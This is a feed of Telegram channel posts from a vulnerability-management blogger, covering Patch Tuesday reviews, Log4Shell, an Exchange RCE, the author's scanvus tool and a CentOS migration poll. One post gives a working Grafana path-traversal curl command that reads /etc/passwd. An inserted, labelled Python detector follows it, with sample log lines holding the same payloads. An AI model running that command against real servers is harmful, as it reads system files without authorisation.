Vulnerability Management and more – Telegram
Vulnerability assessment, IT compliance management, security automation.
Russian channel: @avleonovrus
Russian live news channel: @avleonovlive
PM @leonov_av
#Vulristics #DailyExploits for 2021-11-07 based on #Vulners data

1. 2F657CD7-51C1-50EC-9E70-D422A0CCB2B0 - Exploit for CVE-2021-42574
2. 86E0EEED-C430-5343-BCD1-3FF58D995440 - Exploit for CVE-2021-3129

Yet another RCE in Exchange

"CVE-2021-42321 is a RCE vulnerability in Microsoft Exchange Server. The flaw exists due to the improper validation of command-let (cmdlet) arguments. To exploit this vulnerability, an attacker would need to be authenticated to a vulnerable Exchange Server. Microsoft says they are aware of “limited targeted attacks” using this vulnerability in the wild."

Changed the output of results in scanvus. Now it looks like a true hacking tool. Lol 😅

Also I recently added the ability to analyze data from a text file. Let's say you need to check a Linux server that is in a VERY secure segment. You can go there manually via SSH with several hops, 2FA, etc. But scanning such a server can be very inconvenient. With scanvus you can get a bash script (--show-inventory-script), run it on such a host, save the output to a file and check it with scanvus as python3.8 scanvus.py --assessment-type inventory_file --inventory-file-path invent.txt on your desktop for example. You may not even have access yourself, but you can ask the IT administrator to execute the script and give you the outputs for analysis.

Plz, press the star on GitHub, if you like it. I want this project to move higher on my profile. 🙃

I participated in #TheStandoff in a good company.
I declared at a hacker conference that as a child I was not interested in offensive security, but biology (entomology, mainly) and that it's related to my current work. Checked. ☑️😅
15 minutes after the end of the call, my Internet provider crashed. Lucky. 😇

FYI, live stream and recordings are here: https://standoff365.com/. Direct link to our talk (live dub in English is available).

A big Grafana day
$ curl --path-as-is <grafana>/public/plugins/alertlist/../../../../../../../../../../etc/passwd
Have a nice weekend! 😱😈
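
A defender-side check for the request shown above, as an added example that is not part of the original post: it scans web access logs for requests under /public/plugins/ whose path contains ".." segments, decoding percent-encoding first. The log lines, addresses, status codes and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (not from the original post).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.7 - - [07/Dec/2021:10:01:05 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 0',
    '198.51.100.4 - - [07/Dec/2021:10:02:11 +0000] "GET /public/plugins/alertlist/img/icn-alertlist-panel.svg HTTP/1.1" 200 420',
    '198.51.100.4 - - [07/Dec/2021:10:02:12 +0000] "GET /api/dashboards/home HTTP/1.1" 200 88',
]

# client address, request path and HTTP status from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
PREFIX = "/public/plugins/"


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded dots are seen as '.'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_plugin_traversal(lines):
    """Return one record per request that walks out of a plugin directory."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, raw_path, status = m.group(1), m.group(2), int(m.group(3))
        path = decode_fully(raw_path.split("?", 1)[0])
        if not path.startswith(PREFIX):
            continue
        segments = path[len(PREFIX):].split("/")
        if ".." in segments:
            hits.append({
                "client": client,
                "plugin": segments[0],
                "path": path,
                "served": status == 200,  # True means content was returned
            })
    return hits


if __name__ == "__main__":
    for hit in find_plugin_traversal(SAMPLE_LOG):
        print(hit)
```

Hits with "served" set to True deserve priority, since a 200 response means the server returned content for the traversal path.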

Log4j CVE-2021-44228
A nice pop-up in Nessus Professional 👍 #Log4Shell

Hello everyone! It’s even strange to talk about other vulnerabilities, while everyone is so focused on vulnerabilities in log4j. But life doesn’t stop. Other vulnerabilities appear every day. And of course, there are many critical ones among them that require immediate patching. This episode will be about Microsoft Patch Tuesday for December 2021. I will traditionally use my open source Vulristics tool for analysis.

Video: https://www.youtube.com/watch?v=Vqm1CsXlAtc
Text: https://avleonov.com/2021/12/16/microsoft-patch-tuesday-december-2021/
Full report: https://avleonov.com//vulristics_reports/ms_patch_tuesday_december2021_report_with_comments_ext_img.html

#AppX #iSNS #EFS
Hello everyone! I decided to make a separate episode about Log4Shell. Of course, there have already been many reviews of this vulnerability. But I do it primarily for myself. It seems to me that serious problems with Log4j and similar libraries will be with us for a long time. Therefore, it would be interesting to document how it all began. So what is the root cause of Log4Shell?

Video: https://youtu.be/UW7ZY4TmvvU
Text: https://avleonov.com/2021/12/27/log4j-log4shell-rce-explained-cve-2021-44228/

How was my year of security blogging? Quite buzzing. I've tried different things. Something worked out, something not quite. As a result, 34 posts / videos came out. About half of them are reviews of vulnerabilities and other news, the other half are howtos, mini-researches, my open source code, my opinion on various issues. Hopefully the second part will be bigger next year, it looks like the value of this is higher. But the MS Patch Tuesday reviews will remain - this is sacred. 😇 A dozen more topics got bogged down in drafts. I hope that deliberately simplifying the production video (back to the slideshow without my face in the frame) will help finish these topics. And if not, then well, okay. 🙂

Happy New Year!
I hope to distract myself from information security as much as possible during the holidays, which is what I wish everyone. For those of you interested, here's a list of my posts over the past year:

1. Log4j “Log4Shell” RCE explained (CVE-2021-44228)
2. Microsoft Patch Tuesday December 2021
3. Vulnerability Intelligence based on media hype. It works? Grafana LFI and Log4j “Log4Shell” RCE
4. QSC21, VMDR Training and Exam
5. Vulristics Command Line Interface, improved Product & Vuln. Type Detections and Microsoft Patch Tuesday November 2021
6. VMconf 22 Vulnerability Management conference: Call For Papers started
7. Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle
8. Career Navigator talk for IT Hub College
9. Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus
10. Microsoft Defender for Endpoint: The Latest Versions of Antivirus Engine & Signatures
11. Security News: Exchange ProxyShell, Zoom RCE, Citrix Canceled PT Acknowledgments, Cisco No Patch Router RCEs
12. Security News: Microsoft Patch Tuesday August 2021, Phishers Started Using reCAPTCHA, Scan 1 IP and Go to Jail
13. How to get Antivirus-related Data from Microsoft Defender for Endpoint using Intune and Graph API
14. Last Week’s Security News: Black Hat Pwnie Awards, iPhone Checks Photos, Evil Windows Print Server, Cisco VPN Routers Takeovers
15. Last Week’s Security news: Serious Sam in Metasploit, PetitPotam, Zimbra Hijack, Joint Advisory TOP30 CVEs
16. How to fix “Nessus failed to load the SSH private key” error?
17. Last Week’s Security news: Pegasus, SeriousSAM, Sequoia
18. My thoughts on the “2021 Gartner Market Guide for Vulnerability Assessment”. What about the quality?
19. Last Week’s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins
20. Vulristics Microsoft Patch Tuesday July 2021: Zero-days EoP in Kernel and RCE in Scripting Engine, RCEs in Kernel, DNS Server, Exchange and Hyper-V
21. Vulristics: Microsoft Patch Tuesdays Q2 2021
22. Last Week’s Security news: PrintNightmare, Kaseya, Intune, Metasploit Docker escape
23. Vulristics HTML Report Update: Table for Products, Table for Vuln. Types and “Prevalence”
24. Last Week’s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee
25. PHDays 10: U.S. Sanctions, My Talk on Vulristics, Other Great Talks Related to VM
26. Getting Hosts from Microsoft Intune MDM using Python
27. AM Live Vulnerability Management Conference Part 2: What was I talking about there
28. AM Live Vulnerability Management Conference Part 1: Full video in Russian + Timecodes in English
29. Vulristics: Microsoft Patch Tuesdays Q1 2021
30. Vulristics: Beyond Microsoft Patch Tuesdays, Analyzing Arbitrary CVEs
31. Microsoft Defender for Endpoint: Why You May Need It and How to Export Hosts via API in Python
32. Vulners Linux Audit API for Host Vulnerability Detection: Manual Auditing, Python Scripting and Licensing
33. Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020
34. My projects that are not related to Information Security: Yennysay TTS and PyTouchOk companion app

Hello everyone! End of life for CentOS Linux 8 was 31.12.2021. There won't be CentOS Linux as downstream for RedHat anymore. Only CentOS Stream, that will be upstream for CentOS, more like Fedora.
So, which Enterprise Linux distribution will you recommend your IT colleagues instead of CentOS?
Final Results:
16% - Still keep using CentOS 7 (EOL 2024-06-30)
17% - RHEL
10% - Oracle Linux
3% - Rocky Linux
4% - AlmaLinux
37% - Ubuntu
18% - Debian
0% - Gentoo
5% - Other
8% - No idea

Hello everyone! This episode will be about Microsoft Patch Tuesday for January 2022. Traditionally, I will use my open source Vulristics tool for analysis. This time I didn’t make any changes to how connectors work. The report generation worked correctly on the first try.

Video: https://youtu.be/RXWvP8X3zIw
Blog: https://avleonov.com/2022/01/16/microsoft-patch-tuesday-january-2022/

Hello everyone! As you probably know, CentOS Linux, the main Enterprise-level Linux server distribution, will soon disappear. It wasn’t hard to predict when RedHat acquired CentOS in 2014, and now it is actually happening. End of life of CentOS Linux 8 was 31.12.2021. There won’t be CentOS Linux as downstream for RedHat anymore. Only CentOS Stream, that will be upstream for RedHat, more or less a testing distro like Fedora.

Of course, it is a matter of debate whether security guys can actually decide which Linux distributions a company will use and set that as a requirement. But in any case, the security guys will definitely take part in the decision. I made a poll in my Telegram channel. 113 people voted. So, let’s take a look at the results and discuss which of the Linux distributions we can recommend to IT teams.

Video: https://youtu.be/9-m6dj-0Q3w
Blogpost: https://avleonov.com/2022/01/21/end-of-centos-linux-where-to-migrate/